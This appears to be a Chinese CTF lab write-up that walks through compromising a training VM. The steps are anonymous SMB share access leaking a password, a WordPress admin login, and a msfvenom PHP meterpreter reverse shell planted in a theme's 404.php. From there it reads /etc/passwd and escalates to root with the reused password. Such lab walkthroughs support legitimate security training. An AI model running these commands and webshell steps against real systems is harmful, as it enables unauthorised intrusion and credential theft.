CTF训练 SMB信息泄露(含靶场下载地址)

SMB信息泄露

  • 确认ip,挖掘信息
  • 针对smb协议弱点探测
  • 针对http协议弱点探测
  • 构造payload获取shell
    • 在wordpress中上传webshell
  • 优化终端
  • 获得flag

确认ip,挖掘信息

仍然是首先查看ip,通过sudo -i 获取root,然后用netdiscover找到靶机的地址。
在这里插入图片描述
CTF训练 SMB信息泄露(含靶场下载地址)_第1张图片
CTF训练 SMB信息泄露(含靶场下载地址)_第2张图片
靶机的ip是192.168.43.120
因为虚拟机的网络设置选的是桥接模式,所以后面显示的是vmware, Inc。
挖掘开放信息服务:nmap -sV 192.168.43.17
CTF训练 SMB信息泄露(含靶场下载地址)_第3张图片

针对smb协议弱点探测

因为这节主要针对的是smb协议,所以对其进行一波探测
首先,使用空口令:smbclient -L IP,列出该ip所分享的文件和链接。
CTF训练 SMB信息泄露(含靶场下载地址)_第4张图片
Print 是 共 享 驱 动 , 就 是 共 享 打 印 机 S h a r e 是共享驱动,就是共享打印机 Share Share是共享文件夹
IPC$是共享空连接,不需要用户名就能登陆的web服务器

smbclient ‘\IP\print$’ 查看print里面的东西(没有权限)
在这里插入图片描述

smbclient’\IP\share$'同理
在这里插入图片描述
get+文件名,可以下载获得文件信息
CTF训练 SMB信息泄露(含靶场下载地址)_第5张图片
打开新的终端,打开文件:
CTF训练 SMB信息泄露(含靶场下载地址)_第6张图片
发现写着密码为12345

相同的方法下载todolist.txt下来看看
在这里插入图片描述
接下来打开wordpress看看,主要看配置文件
CTF训练 SMB信息泄露(含靶场下载地址)_第7张图片
可以从前面看到该服务器开放了mysql 3306端口,尝试直接连接数据库
在这里插入图片描述
失败

因为开放了22端口,尝试使用ssh协议远程登录。
CTF训练 SMB信息泄露(含靶场下载地址)_第8张图片
(下面因为更换了网络,导致ip地址出现了变化
从192.168.43.120变成了192.168.3.13。)

针对smb协议,查看是否存在远程溢出漏洞进行分析。
searchsploit samba版本号
在这里插入图片描述
没有任何漏洞可以利用

针对http协议弱点探测

使用dirb命令进行扫描
CTF训练 SMB信息泄露(含靶场下载地址)_第9张图片
发现wrodpress的wp-admin
CTF训练 SMB信息泄露(含靶场下载地址)_第10张图片
打开网页看看
CTF训练 SMB信息泄露(含靶场下载地址)_第11张图片
输入前面的wp-config.php中的账号和密码。
CTF训练 SMB信息泄露(含靶场下载地址)_第12张图片
成功进入

构造payload获取shell

使用msfvenom构造payload
CTF训练 SMB信息泄露(含靶场下载地址)_第13张图片
不用输入lhost 和lport,已经自己构造好了。

新建一个shell.php文件,将payload输入(此处的ip是攻击机的ip):
在这里插入图片描述
在这里插入图片描述
使用payload:
打开msfconsole
CTF训练 SMB信息泄露(含靶场下载地址)_第14张图片
输入use exploit/multi/handler命令
在这里插入图片描述
设置payload
set payload php/meterpreter/reverse_tcp
在这里插入图片描述
通过show options查看设置
CTF训练 SMB信息泄露(含靶场下载地址)_第15张图片
设置lhost,通过show options查看:
CTF训练 SMB信息泄露(含靶场下载地址)_第16张图片
run启动监听
在这里插入图片描述

在wordpress中上传webshell

获取反弹shell:wordpress 上传点 theme 404.php
执行:http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

将webshell.php粘贴到 wordpress中的Appearance中,Editor中的404页面
CTF训练 SMB信息泄露(含靶场下载地址)_第17张图片
点击update file
CTF训练 SMB信息泄露(含靶场下载地址)_第18张图片
接下来访问404页面
在这里插入图片描述
执行:http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php

注意这里的twentyfifiteen要按照图中自己的实际情况修改,打开网址
在这里插入图片描述
查看监听端:
在这里插入图片描述
发现确实返回了一个shell,而且是从靶场ip返回的

输入shell,输入id,查看当前用户
在这里插入图片描述
到这里便拿到了服务器的普通权限。

优化终端

python -c “import pty;pty.spawn(’/bin/bash’)”
在这里插入图片描述
回到了熟悉的界面。

获得flag

使用cat /etc/passwd命令
来查看每个用户账号的属性。
CTF训练 SMB信息泄露(含靶场下载地址)_第19张图片
可以看到里面有一个熟悉的,在wordpress页面中出现了很多次的用户togie,切换到其账户:

su togie
在这里插入图片描述
密码是之前deets.txt中写的12345
在这里插入图片描述
成功进入
同理,使用sudo -i命令进入root模式,密码同样是12345
在这里插入图片描述
进入root目录,可以看到proof.txt文件。
CTF训练 SMB信息泄露(含靶场下载地址)_第20张图片

你可能感兴趣的:(CTF入门,ctf,网络攻防,web,smb)